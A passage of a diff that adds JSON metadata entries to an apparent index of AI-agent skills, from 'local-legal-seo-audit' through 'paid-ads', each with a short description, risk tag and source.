+ "category": "uncategorized",
+ "name": "local-legal-seo-audit",
+ "description": "Audit and improve local SEO for law firms, attorneys, forensic experts and legal/professional services sites with local presence, focusing on GBP, directories, E-E-A-T and practice/location pages.",
+ "risk": "safe",
+ "source": "original",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "logistics-exception-management",
+ "path": "skills/logistics-exception-management",
+ "category": "uncategorized",
+ "name": "logistics-exception-management",
+ "description": "Codified expertise for handling freight exceptions, shipment delays, damages, losses, and carrier disputes. Informed by logistics professionals with 15+ years operational experience.",
+ "risk": "safe",
+ "source": "https://github.com/ai-evos/agent-skills",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "loki-mode",
+ "path": "skills/loki-mode",
+ "category": "uncategorized",
+ "name": "loki-mode",
+ "description": "Multi-agent autonomous startup system for Claude Code. Triggers on \"Loki Mode\". Orchestrates 100+ specialized agents across engineering, QA, DevOps, security, data/ML, business operations,...",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "m365-agents-dotnet",
+ "path": "skills/m365-agents-dotnet",
+ "category": "uncategorized",
+ "name": "m365-agents-dotnet",
+ "description": "Microsoft 365 Agents SDK for .NET. Build multichannel agents for Teams/M365/Copilot Studio with ASP.NET Core hosting, AgentApplication routing, and MSAL-based auth.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "m365-agents-py",
+ "path": "skills/m365-agents-py",
+ "category": "uncategorized",
+ "name": "m365-agents-py",
+ "description": "Microsoft 365 Agents SDK for Python. Build multichannel agents for Teams/M365/Copilot Studio with aiohttp hosting, AgentApplication routing, streaming responses, and MSAL-based auth.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "m365-agents-ts",
+ "path": "skills/m365-agents-ts",
+ "category": "uncategorized",
+ "name": "m365-agents-ts",
+ "description": "Microsoft 365 Agents SDK for TypeScript/Node.js.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "machine-learning-ops-ml-pipeline",
+ "path": "skills/machine-learning-ops-ml-pipeline",
+ "category": "uncategorized",
+ "name": "machine-learning-ops-ml-pipeline",
+ "description": "Design and implement a complete ML pipeline for: $ARGUMENTS",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "mailchimp-automation",
+ "path": "skills/mailchimp-automation",
+ "category": "uncategorized",
+ "name": "mailchimp-automation",
+ "description": "Automate Mailchimp email marketing including campaigns, audiences, subscribers, segments, and analytics via Rube MCP (Composio). Always search tools first for current schemas.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "make-automation",
+ "path": "skills/make-automation",
+ "category": "uncategorized",
+ "name": "make-automation",
+ "description": "Automate Make (Integromat) tasks via Rube MCP (Composio): operations, enums, language and timezone lookups. Always search tools first for current schemas.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "makepad-skills",
+ "path": "skills/makepad-skills",
+ "category": "uncategorized",
+ "name": "makepad-skills",
+ "description": "Makepad UI development skills for Rust apps: setup, patterns, shaders, packaging, and troubleshooting.",
+ "risk": "safe",
+ "source": "https://github.com/ZhangHanDong/makepad-skills",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "malware-analyst",
+ "path": "skills/malware-analyst",
+ "category": "uncategorized",
+ "name": "malware-analyst",
+ "description": "Expert malware analyst specializing in defensive malware research, threat intelligence, and incident response. Masters sandbox analysis, behavioral analysis, and malware family identification.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "manifest",
+ "path": "skills/manifest",
+ "category": "uncategorized",
+ "name": "manifest",
+ "description": "Install and configure the Manifest observability plugin for your agents. Use when setting up telemetry, configuring API keys, or troubleshooting the plugin.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "market-sizing-analysis",
+ "path": "skills/market-sizing-analysis",
+ "category": "uncategorized",
+ "name": "market-sizing-analysis",
+ "description": "This skill should be used when the user asks to \\\\\\\"calculate TAM\\\\\\\", \"determine SAM\", \"estimate SOM\", \"size the market\", \"calculate market opportunity\", \"what's the total addressable market\", or...",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "marketing-ideas",
+ "path": "skills/marketing-ideas",
+ "category": "uncategorized",
+ "name": "marketing-ideas",
+ "description": "Provide proven marketing strategies and growth ideas for SaaS and software products, prioritized using a marketing feasibility scoring system.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "marketing-psychology",
+ "path": "skills/marketing-psychology",
+ "category": "uncategorized",
+ "name": "marketing-psychology",
+ "description": "Apply behavioral science and mental models to marketing decisions, prioritized using a psychological leverage and feasibility scoring system.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "mcp-builder",
+ "path": "skills/mcp-builder",
+ "category": "uncategorized",
+ "name": "mcp-builder",
+ "description": "Guide for creating high-quality MCP (Model Context Protocol) servers that enable LLMs to interact with external services through well-designed tools. Use when building MCP servers to integrate exte...",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "mcp-builder-ms",
+ "path": "skills/mcp-builder-ms",
+ "category": "uncategorized",
+ "name": "mcp-builder-ms",
+ "description": "Guide for creating high-quality MCP (Model Context Protocol) servers that enable LLMs to interact with external services through well-designed tools. Use when building MCP servers to integrate exte...",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "memory-forensics",
+ "path": "skills/memory-forensics",
+ "category": "uncategorized",
+ "name": "memory-forensics",
+ "description": "Master memory forensics techniques including memory acquisition, process analysis, and artifact extraction using Volatility and related tools. Use when analyzing memory dumps, investigating inciden...",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "memory-safety-patterns",
+ "path": "skills/memory-safety-patterns",
+ "category": "uncategorized",
+ "name": "memory-safety-patterns",
+ "description": "Implement memory-safe programming with RAII, ownership, smart pointers, and resource management across Rust, C++, and C. Use when writing safe systems code, managing resources, or preventing memory...",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "memory-systems",
+ "path": "skills/memory-systems",
+ "category": "uncategorized",
+ "name": "memory-systems",
+ "description": "Design short-term, long-term, and graph-based memory architectures",
+ "risk": "safe",
+ "source": "https://github.com/muratcankoylan/Agent-Skills-for-Context-Engineering/tree/main/skills/memory-systems",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "mermaid-expert",
+ "path": "skills/mermaid-expert",
+ "category": "uncategorized",
+ "name": "mermaid-expert",
+ "description": "Create Mermaid diagrams for flowcharts, sequences, ERDs, and architectures. Masters syntax for all diagram types and styling.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "metasploit-framework",
+ "path": "skills/metasploit-framework",
+ "category": "uncategorized",
+ "name": "metasploit-framework",
+ "description": "This skill should be used when the user asks to \"use Metasploit for penetration testing\", \"exploit vulnerabilities with msfconsole\", \"create payloads with msfvenom\", \"perform post-exp...",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "micro-saas-launcher",
+ "path": "skills/micro-saas-launcher",
+ "category": "uncategorized",
+ "name": "micro-saas-launcher",
+ "description": "Expert in launching small, focused SaaS products fast - the indie hacker approach to building profitable software. Covers idea validation, MVP development, pricing, launch strategies, and growing t...",
+ "risk": "unknown",
+ "source": "vibeship-spawner-skills (Apache 2.0)",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "microservices-patterns",
+ "path": "skills/microservices-patterns",
+ "category": "uncategorized",
+ "name": "microservices-patterns",
+ "description": "Design microservices architectures with service boundaries, event-driven communication, and resilience patterns. Use when building distributed systems, decomposing monoliths, or implementing micros...",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "microsoft-azure-webjobs-extensions-authentication-events-dotnet",
+ "path": "skills/microsoft-azure-webjobs-extensions-authentication-events-dotnet",
+ "category": "uncategorized",
+ "name": "microsoft-azure-webjobs-extensions-authentication-events-dotnet",
+ "description": "Microsoft Entra Authentication Events SDK for .NET. Azure Functions triggers for custom authentication extensions.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "microsoft-teams-automation",
+ "path": "skills/microsoft-teams-automation",
+ "category": "uncategorized",
+ "name": "microsoft-teams-automation",
+ "description": "Automate Microsoft Teams tasks via Rube MCP (Composio): send messages, manage channels, create meetings, handle chats, and search messages. Always search tools first for current schemas.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "minecraft-bukkit-pro",
+ "path": "skills/minecraft-bukkit-pro",
+ "category": "uncategorized",
+ "name": "minecraft-bukkit-pro",
+ "description": "Master Minecraft server plugin development with Bukkit, Spigot, and Paper APIs.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "miro-automation",
+ "path": "skills/miro-automation",
+ "category": "uncategorized",
+ "name": "miro-automation",
+ "description": "Automate Miro tasks via Rube MCP (Composio): boards, items, sticky notes, frames, sharing, connectors. Always search tools first for current schemas.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "mixpanel-automation",
+ "path": "skills/mixpanel-automation",
+ "category": "uncategorized",
+ "name": "mixpanel-automation",
+ "description": "Automate Mixpanel tasks via Rube MCP (Composio): events, segmentation, funnels, cohorts, user profiles, JQL queries. Always search tools first for current schemas.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "ml-engineer",
+ "path": "skills/ml-engineer",
+ "category": "uncategorized",
+ "name": "ml-engineer",
+ "description": "Build production ML systems with PyTorch 2.x, TensorFlow, and modern ML frameworks. Implements model serving, feature engineering, A/B testing, and monitoring.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "ml-pipeline-workflow",
+ "path": "skills/ml-pipeline-workflow",
+ "category": "uncategorized",
+ "name": "ml-pipeline-workflow",
+ "description": "Build end-to-end MLOps pipelines from data preparation through model training, validation, and production deployment. Use when creating ML pipelines, implementing MLOps practices, or automating mod...",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "mlops-engineer",
+ "path": "skills/mlops-engineer",
+ "category": "uncategorized",
+ "name": "mlops-engineer",
+ "description": "Build comprehensive ML pipelines, experiment tracking, and model registries with MLflow, Kubeflow, and modern MLOps tools.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "mobile-design",
+ "path": "skills/mobile-design",
+ "category": "uncategorized",
+ "name": "mobile-design",
+ "description": "Mobile-first design and engineering doctrine for iOS and Android apps. Covers touch interaction, performance, platform conventions, offline behavior, and mobile-specific decision-making. Teaches pr...",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "mobile-developer",
+ "path": "skills/mobile-developer",
+ "category": "uncategorized",
+ "name": "mobile-developer",
+ "description": "Develop React Native, Flutter, or native mobile apps with modern architecture patterns. Masters cross-platform development, native integrations, offline sync, and app store optimization.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "mobile-games",
+ "path": "skills/game-development/mobile-games",
+ "category": "game-development",
+ "name": "mobile-games",
+ "description": "Mobile game development principles. Touch input, battery, performance, app stores.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "mobile-security-coder",
+ "path": "skills/mobile-security-coder",
+ "category": "uncategorized",
+ "name": "mobile-security-coder",
+ "description": "Expert in secure mobile coding practices specializing in input validation, WebView security, and mobile-specific security patterns.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "modern-javascript-patterns",
+ "path": "skills/modern-javascript-patterns",
+ "category": "uncategorized",
+ "name": "modern-javascript-patterns",
+ "description": "Master ES6+ features including async/await, destructuring, spread operators, arrow functions, promises, modules, iterators, generators, and functional programming patterns for writing clean, effici...",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "monday-automation",
+ "path": "skills/monday-automation",
+ "category": "uncategorized",
+ "name": "monday-automation",
+ "description": "Automate Monday.com work management including boards, items, columns, groups, subitems, and updates via Rube MCP (Composio). Always search tools first for current schemas.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "monorepo-architect",
+ "path": "skills/monorepo-architect",
+ "category": "uncategorized",
+ "name": "monorepo-architect",
+ "description": "Expert in monorepo architecture, build systems, and dependency management at scale. Masters Nx, Turborepo, Bazel, and Lerna for efficient multi-project development. Use PROACTIVELY for monorepo setup,",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "monorepo-management",
+ "path": "skills/monorepo-management",
+ "category": "uncategorized",
+ "name": "monorepo-management",
+ "description": "Master monorepo management with Turborepo, Nx, and pnpm workspaces to build efficient, scalable multi-package repositories with optimized builds and dependency management. Use when setting up monor...",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "moodle-external-api-development",
+ "path": "skills/moodle-external-api-development",
+ "category": "uncategorized",
+ "name": "moodle-external-api-development",
+ "description": "Create custom external web service APIs for Moodle LMS. Use when implementing web services for course management, user tracking, quiz operations, or custom plugin functionality. Covers parameter va...",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "mtls-configuration",
+ "path": "skills/mtls-configuration",
+ "category": "uncategorized",
+ "name": "mtls-configuration",
+ "description": "Configure mutual TLS (mTLS) for zero-trust service-to-service communication. Use when implementing zero-trust networking, certificate management, or securing internal service communication.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "multi-agent-brainstorming",
+ "path": "skills/multi-agent-brainstorming",
+ "category": "uncategorized",
+ "name": "multi-agent-brainstorming",
+ "description": "Simulate a structured peer-review process using multiple specialized agents to validate designs, surface hidden assumptions, and identify failure modes before implementation.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "multi-agent-patterns",
+ "path": "skills/multi-agent-patterns",
+ "category": "uncategorized",
+ "name": "multi-agent-patterns",
+ "description": "Master orchestrator, peer-to-peer, and hierarchical multi-agent architectures",
+ "risk": "safe",
+ "source": "https://github.com/muratcankoylan/Agent-Skills-for-Context-Engineering/tree/main/skills/multi-agent-patterns",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "multi-cloud-architecture",
+ "path": "skills/multi-cloud-architecture",
+ "category": "uncategorized",
+ "name": "multi-cloud-architecture",
+ "description": "Design multi-cloud architectures using a decision framework to select and integrate services across AWS, Azure, and GCP. Use when building multi-cloud systems, avoiding vendor lock-in, or leveragin...",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "multi-platform-apps-multi-platform",
+ "path": "skills/multi-platform-apps-multi-platform",
+ "category": "uncategorized",
+ "name": "multi-platform-apps-multi-platform",
+ "description": "Build and deploy the same feature consistently across web, mobile, and desktop platforms using API-first architecture and parallel implementation strategies.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "multiplayer",
+ "path": "skills/game-development/multiplayer",
+ "category": "game-development",
+ "name": "multiplayer",
+ "description": "Multiplayer game development principles. Architecture, networking, synchronization.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "n8n-code-python",
+ "path": "skills/n8n-code-python",
+ "category": "uncategorized",
+ "name": "n8n-code-python",
+ "description": "Write Python code in n8n Code nodes. Use when writing Python in n8n, using _input/_json/_node syntax, working with standard library, or need to understand Python limitations in n8n Code nodes.",
+ "risk": "safe",
+ "source": "https://github.com/czlonkowski/n8n-skills/tree/main/skills/n8n-code-python",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "n8n-mcp-tools-expert",
+ "path": "skills/n8n-mcp-tools-expert",
+ "category": "uncategorized",
+ "name": "n8n-mcp-tools-expert",
+ "description": "Expert guide for using n8n-mcp MCP tools effectively. Use when searching for nodes, validating configurations, accessing templates, managing workflows, or using any n8n-mcp tool. Provides tool sele...",
+ "risk": "safe",
+ "source": "https://github.com/czlonkowski/n8n-skills/tree/main/skills/n8n-mcp-tools-expert",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "n8n-node-configuration",
+ "path": "skills/n8n-node-configuration",
+ "category": "uncategorized",
+ "name": "n8n-node-configuration",
+ "description": "Operation-aware node configuration guidance. Use when configuring nodes, understanding property dependencies, determining required fields, choosing between get_node detail levels, or learning commo...",
+ "risk": "safe",
+ "source": "https://github.com/czlonkowski/n8n-skills/tree/main/skills/n8n-node-configuration",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "nanobanana-ppt-skills",
+ "path": "skills/nanobanana-ppt-skills",
+ "category": "uncategorized",
+ "name": "nanobanana-ppt-skills",
+ "description": "AI-powered PPT generation with document analysis and styled images",
+ "risk": "safe",
+ "source": "https://github.com/op7418/NanoBanana-PPT-Skills",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "neon-postgres",
+ "path": "skills/neon-postgres",
+ "category": "uncategorized",
+ "name": "neon-postgres",
+ "description": "Expert patterns for Neon serverless Postgres, branching, connection pooling, and Prisma/Drizzle integration Use when: neon database, serverless postgres, database branching, neon postgres, postgres...",
+ "risk": "unknown",
+ "source": "vibeship-spawner-skills (Apache 2.0)",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "nerdzao-elite",
+ "path": "skills/nerdzao-elite",
+ "category": "uncategorized",
+ "name": "nerdzao-elite",
+ "description": "Senior Elite Software Engineer (15+) and Senior Product Designer. Full workflow with planning, architecture, TDD, clean code, and pixel-perfect UX validation.",
+ "risk": "safe",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "nerdzao-elite-gemini-high",
+ "path": "skills/nerdzao-elite-gemini-high",
+ "category": "uncategorized",
+ "name": "nerdzao-elite-gemini-high",
+ "description": "Modo Elite Coder + UX Pixel-Perfect otimizado especificamente para Gemini 3.1 Pro High. Workflow completo com foco em qualidade m\u00e1xima e efici\u00eancia de tokens.",
+ "risk": "safe",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "nestjs-expert",
+ "path": "skills/nestjs-expert",
+ "category": "framework",
+ "name": "nestjs-expert",
+ "description": "Nest.js framework expert specializing in module architecture, dependency injection, middleware, guards, interceptors, testing with Jest/Supertest, TypeORM/Mongoose integration, and Passport.js auth...",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "network-101",
+ "path": "skills/network-101",
+ "category": "uncategorized",
+ "name": "network-101",
+ "description": "This skill should be used when the user asks to \"set up a web server\", \"configure HTTP or HTTPS\", \"perform SNMP enumeration\", \"configure SMB shares\", \"test network services\", or ne...",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "network-engineer",
+ "path": "skills/network-engineer",
+ "category": "uncategorized",
+ "name": "network-engineer",
+ "description": "Expert network engineer specializing in modern cloud networking, security architectures, and performance optimization.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "nextjs-app-router-patterns",
+ "path": "skills/nextjs-app-router-patterns",
+ "category": "uncategorized",
+ "name": "nextjs-app-router-patterns",
+ "description": "Master Next.js 14+ App Router with Server Components, streaming, parallel routes, and advanced data fetching. Use when building Next.js applications, implementing SSR/SSG, or optimizing React Serve...",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "nextjs-best-practices",
+ "path": "skills/nextjs-best-practices",
+ "category": "uncategorized",
+ "name": "nextjs-best-practices",
+ "description": "Next.js App Router principles. Server Components, data fetching, routing patterns.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "nextjs-supabase-auth",
+ "path": "skills/nextjs-supabase-auth",
+ "category": "uncategorized",
+ "name": "nextjs-supabase-auth",
+ "description": "Expert integration of Supabase Auth with Next.js App Router Use when: supabase auth next, authentication next.js, login supabase, auth middleware, protected route.",
+ "risk": "unknown",
+ "source": "vibeship-spawner-skills (Apache 2.0)",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "nft-standards",
+ "path": "skills/nft-standards",
+ "category": "uncategorized",
+ "name": "nft-standards",
+ "description": "Implement NFT standards (ERC-721, ERC-1155) with proper metadata handling, minting strategies, and marketplace integration. Use when creating NFT contracts, building NFT marketplaces, or implementi...",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "nodejs-backend-patterns",
+ "path": "skills/nodejs-backend-patterns",
+ "category": "uncategorized",
+ "name": "nodejs-backend-patterns",
+ "description": "Build production-ready Node.js backend services with Express/Fastify, implementing middleware patterns, error handling, authentication, database integration, and API design best practices. Use when...",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "nodejs-best-practices",
+ "path": "skills/nodejs-best-practices",
+ "category": "uncategorized",
+ "name": "nodejs-best-practices",
+ "description": "Node.js development principles and decision-making. Framework selection, async patterns, security, and architecture. Teaches thinking, not copying.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "nosql-expert",
+ "path": "skills/nosql-expert",
+ "category": "uncategorized",
+ "name": "nosql-expert",
+ "description": "Expert guidance for distributed NoSQL databases (Cassandra, DynamoDB). Focuses on mental models, query-first modeling, single-table design, and avoiding hot partitions in high-scale systems.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "notebooklm",
+ "path": "skills/notebooklm",
+ "category": "uncategorized",
+ "name": "notebooklm",
+ "description": "Use this skill to query your Google NotebookLM notebooks directly from Claude Code for source-grounded, citation-backed answers from Gemini. Browser automation, library management, persistent auth....",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "notion-automation",
+ "path": "skills/notion-automation",
+ "category": "uncategorized",
+ "name": "notion-automation",
+ "description": "Automate Notion tasks via Rube MCP (Composio): pages, databases, blocks, comments, users. Always search tools first for current schemas.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "notion-template-business",
+ "path": "skills/notion-template-business",
+ "category": "uncategorized",
+ "name": "notion-template-business",
+ "description": "Expert in building and selling Notion templates as a business - not just making templates, but building a sustainable digital product business. Covers template design, pricing, marketplaces, market...",
+ "risk": "unknown",
+ "source": "vibeship-spawner-skills (Apache 2.0)",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "nx-workspace-patterns",
+ "path": "skills/nx-workspace-patterns",
+ "category": "uncategorized",
+ "name": "nx-workspace-patterns",
+ "description": "Configure and optimize Nx monorepo workspaces. Use when setting up Nx, configuring project boundaries, optimizing build caching, or implementing affected commands.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "observability-engineer",
+ "path": "skills/observability-engineer",
+ "category": "uncategorized",
+ "name": "observability-engineer",
+ "description": "Build production-ready monitoring, logging, and tracing systems. Implements comprehensive observability strategies, SLI/SLO management, and incident response workflows.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "observability-monitoring-monitor-setup",
+ "path": "skills/observability-monitoring-monitor-setup",
+ "category": "uncategorized",
+ "name": "observability-monitoring-monitor-setup",
+ "description": "You are a monitoring and observability expert specializing in implementing comprehensive monitoring solutions. Set up metrics collection, distributed tracing, log aggregation, and create insightful da",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "observability-monitoring-slo-implement",
+ "path": "skills/observability-monitoring-slo-implement",
+ "category": "uncategorized",
+ "name": "observability-monitoring-slo-implement",
+ "description": "You are an SLO (Service Level Objective) expert specializing in implementing reliability standards and error budget-based practices. Design SLO frameworks, define SLIs, and build monitoring that ba...",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "observe-whatsapp",
+ "path": "skills/observe-whatsapp",
+ "category": "uncategorized",
+ "name": "observe-whatsapp",
+ "description": "Observe and troubleshoot WhatsApp in Kapso: debug message delivery, inspect webhook deliveries/retries, triage API errors, and run health checks. Use when investigating production issues, message f...",
+ "risk": "safe",
+ "source": "https://github.com/gokapso/agent-skills/tree/master/skills/observe-whatsapp",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "obsidian-clipper-template-creator",
+ "path": "skills/obsidian-clipper-template-creator",
+ "category": "uncategorized",
+ "name": "obsidian-clipper-template-creator",
+ "description": "Guide for creating templates for the Obsidian Web Clipper. Use when you want to create a new clipping template, understand available variables, or format clipped content.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "office-productivity",
+ "path": "skills/office-productivity",
+ "category": "workflow-bundle",
+ "name": "office-productivity",
+ "description": "Office productivity workflow covering document creation, spreadsheet automation, presentation generation, and integration with LibreOffice and Microsoft Office formats.",
+ "risk": "safe",
+ "source": "personal",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "on-call-handoff-patterns",
+ "path": "skills/on-call-handoff-patterns",
+ "category": "uncategorized",
+ "name": "on-call-handoff-patterns",
+ "description": "Master on-call shift handoffs with context transfer, escalation procedures, and documentation. Use when transitioning on-call responsibilities, documenting shift summaries, or improving on-call pro...",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "onboarding-cro",
+ "path": "skills/onboarding-cro",
+ "category": "uncategorized",
+ "name": "onboarding-cro",
+ "description": "When the user wants to optimize post-signup onboarding, user activation, first-run experience, or time-to-value. Also use when the user mentions \"onboarding flow,\" \"activation rate,\" \"u...",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "one-drive-automation",
+ "path": "skills/one-drive-automation",
+ "category": "uncategorized",
+ "name": "one-drive-automation",
+ "description": "Automate OneDrive file management, search, uploads, downloads, sharing, permissions, and folder operations via Rube MCP (Composio). Always search tools first for current schemas.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "openapi-spec-generation",
+ "path": "skills/openapi-spec-generation",
+ "category": "uncategorized",
+ "name": "openapi-spec-generation",
+ "description": "Generate and maintain OpenAPI 3.1 specifications from code, design-first specs, and validation patterns. Use when creating API documentation, generating SDKs, or ensuring API contract compliance.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "os-scripting",
+ "path": "skills/os-scripting",
+ "category": "workflow-bundle",
+ "name": "os-scripting",
+ "description": "Operating system and shell scripting troubleshooting workflow for Linux, macOS, and Windows. Covers bash scripting, system administration, debugging, and automation.",
+ "risk": "safe",
+ "source": "personal",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "oss-hunter",
+ "path": "skills/oss-hunter",
+ "category": "uncategorized",
+ "name": "oss-hunter",
+ "description": "Automatically hunt for high-impact OSS contribution opportunities in trending repositories.",
+ "risk": "safe",
+ "source": "https://github.com/jackjin1997/ClawForge",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "outlook-automation",
+ "path": "skills/outlook-automation",
+ "category": "uncategorized",
+ "name": "outlook-automation",
+ "description": "Automate Outlook tasks via Rube MCP (Composio): emails, calendar, contacts, folders, attachments. Always search tools first for current schemas.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "outlook-calendar-automation",
+ "path": "skills/outlook-calendar-automation",
+ "category": "uncategorized",
+ "name": "outlook-calendar-automation",
+ "description": "Automate Outlook Calendar tasks via Rube MCP (Composio): create events, manage attendees, find meeting times, and handle invitations. Always search tools first for current schemas.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "page-cro",
+ "path": "skills/page-cro",
+ "category": "uncategorized",
+ "name": "page-cro",
+ "description": "Analyze and optimize individual pages for conversion performance.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "pagerduty-automation",
+ "path": "skills/pagerduty-automation",
+ "category": "uncategorized",
+ "name": "pagerduty-automation",
+ "description": "Automate PagerDuty tasks via Rube MCP (Composio): manage incidents, services, schedules, escalation policies, and on-call rotations. Always search tools first for current schemas.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "paid-ads",
+ "path": "skills/paid-ads",
+ "category": "uncategorized",
+ "name": "paid-ads",
+ "description": "When the user wants help with paid advertising campaigns on Google Ads, Meta (Facebook/Instagram), LinkedIn, Twitter/X, or other ad platforms. Also use when the user mentions 'PPC,' 'paid media,' '...",
+ "risk": "unknown",
+ "source": "community",
